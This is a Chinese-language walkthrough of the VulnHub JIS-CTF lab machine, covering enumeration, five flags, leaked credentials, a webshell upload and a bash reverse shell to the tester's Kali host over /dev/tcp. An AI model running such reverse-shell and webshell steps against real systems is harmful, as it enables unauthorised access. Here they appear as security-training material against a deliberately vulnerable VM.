首页 > 其他分享 >vulnhub - JIS-CTF

vulnhub - JIS-CTF

时间:2024-07-08 21:09:44浏览次数:11  
标签:uploaded flag 192.168 Disallow CTF vulnhub 157.172 txt JIS

vulnhub - JIS-CTF

这个靶场一共有5个flag

信息收集

靶机ip:192.168.157.172

kali ip:192.168.157.161

nmap 192.168.157.0/24
nmap -sT --min-rate 10000 -p- 192.168.157.172
sudo nmap -sT -sV -sC -O -p22,80 192.168.157.172

image-20240704111807615

一眼看到robots.txt

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

flag1

访问/flag

The 1st flag is : {8734509128730458630012095}

flag2

访问/admin_area

<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->

image-20240704112330865

登录后就是文件上传区,一句话木马连蚁剑,图片路径在/uploaded_files

flag3

image-20240704112918421

找到hint.txt

image-20240704113017952

flag.txt现在不可读,看提示应该先用ssh登入technawi账户

image-20240704113230796

还是个root权限账户

image-20240704113333697

这个文件也很可疑,但是大小是0b,应该只是个提示文件

先反弹shell

kali
nc -lnvp 9999
蚁剑终端
bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'

flag4

一般情况来说,root下的flag是最终的flag5,所以还有flag4没有找到

grep -sr "The 4th flag is" /etc

image-20240704114437553

顺便看一下这个文件

www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
<1:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt       
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

拿到ssh密码

flag5

登录后cat flag

image-20240704114752970

通关

标签:uploaded,flag,192.168,Disallow,CTF,vulnhub,157.172,txt,JIS
From: https://www.cnblogs.com/Mar10/p/18290693

相关文章

  • CTF_复现(部分) | _XGCTF_西瓜杯
    2024.7.5-2024.7.7的比赛没来得及参加,今天有时间来复现一下。官方WP:XGCTF(西瓜杯官方wp)MISC【未完成】她说她想结婚题目林佑生在雪地里面找到了key并骂了出来,最终他感慨:时间过得好快,戳戳戳的一下就没了,快的来不及眨。就像天空中绽放的烟花,那美好的一瞬间,再看已消散不见。......
  • DownUnderCTF 2024 - Forensics
    DownUnderCTF2024-ForensicsBaby'sFirstForensics他们整个上午都在试图破坏我们的基础设施!他们正试图获得更多关于我们秘密袋鼠的信息!我们需要您的帮助,我们已经捕获了一些他们攻击我们的流量,您能告诉我们他们使用的是什么工具及其版本吗?注意:将您的答案包装在DUCTF{}中,......
  • 西瓜杯CTF2024
    前言闲着无聊做一下,也是出了一道很简单的密码,也是被秒了最后结果,misc差一题,reverse当misc做了也差一题,web就第一题,pwn没有。更加坚定了只搞密码的决心了。crypto奇怪的条形码硬看,然后根据base64解密结果微调关键点:大小写 字母大写J和小写p最后因为题目flag设置错误,后面才......
  • CTFHUB-彩蛋教程
    目录1.首页2.公众号3.题目入口4.writeup5.工具6.赛事7.真题8.投稿提交6:1212:1818:2424:3030:3636:4242:481.首页根据提示,在原始首页查看页面源代码,无发现,经过不断尝试,发现访问api.ctfhub.com有回显api.ctfhub.com右键查看页面源代码,CTRL+F......
  • CTFHUB-SSRF-302跳转 Bypass
    开启题目,页面空白尝试访问127.0.0.1/flag.php页面?url=127.0.0.1/flag.php提示:不允许企业内部IP访问,使用file协议获取其源码,得到flag.php页面源码?url=file:///var/www/html/flag.php与之前一样,通过REMOTE_ADDR请求头限制本地IP请求,源码中并没有之前的hacker!BanI......
  • CTFHUB-SSRF-数字IP Bypass
    开启题目,页面空白根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001构造题目有所需Payload?url=0x7f000001/flag.php访问得到了flag八进制:0177.000.000.001十进制:127.0.0.1十六进制:0x7f000001进制转换网址:https://www.bchrt.com/tools......
  • CTFHUB-SSRF-URL Bypass
    开启题目给出提示,url参数的值中必须包含有http://notfound.ctfhub.com,可以采用@,也就是HTTP基本身份认证绕过HTTP基本身份认证允许Web浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。也就是:http://[email protected]形......
  • ctfshow-web入门-文件上传(web151-web160)
    目录1、web1512、web1523、web1534、web1545、web1556、web1567、web1578、web1589、web15910、web1601、web151试了下前端只能传png后缀的将一句话木马改成png后缀,上传后用burpsuite抓包绕过前端检测后,改回php后缀,发包调用:/upload/eval.php?cm......
  • xctf smarty 利用 LD_PRELOAD 环境变量绕过disable_functions
    进来看页面一眼看出为smarty注入,尝试查看smarty版本再进行下一步操作。可以看到是3.1.30那么就可以利用if标签来进行注入。利用file_put_contents上传木马。接下来蚁剑访问,发现没有权限,想到可能需要绕过disable_functions,而绕过disable_functions就那么几种,尝试利用LD_PRELOAD......
  • CTF常用sql注入(二)报错注入(普通以及双查询)
    0x05报错注入适用于页面无正常回显,但是有报错,那么就可以使用报错注入基础函数floor()向下取整函数返回小于或等于传入参数的最大整数。换句话说,它将数字向下取整到最接近的整数值。示例:floor(3.7)返回3floor(-2.5)返回-3round()四舍五入函数将传入的数字四......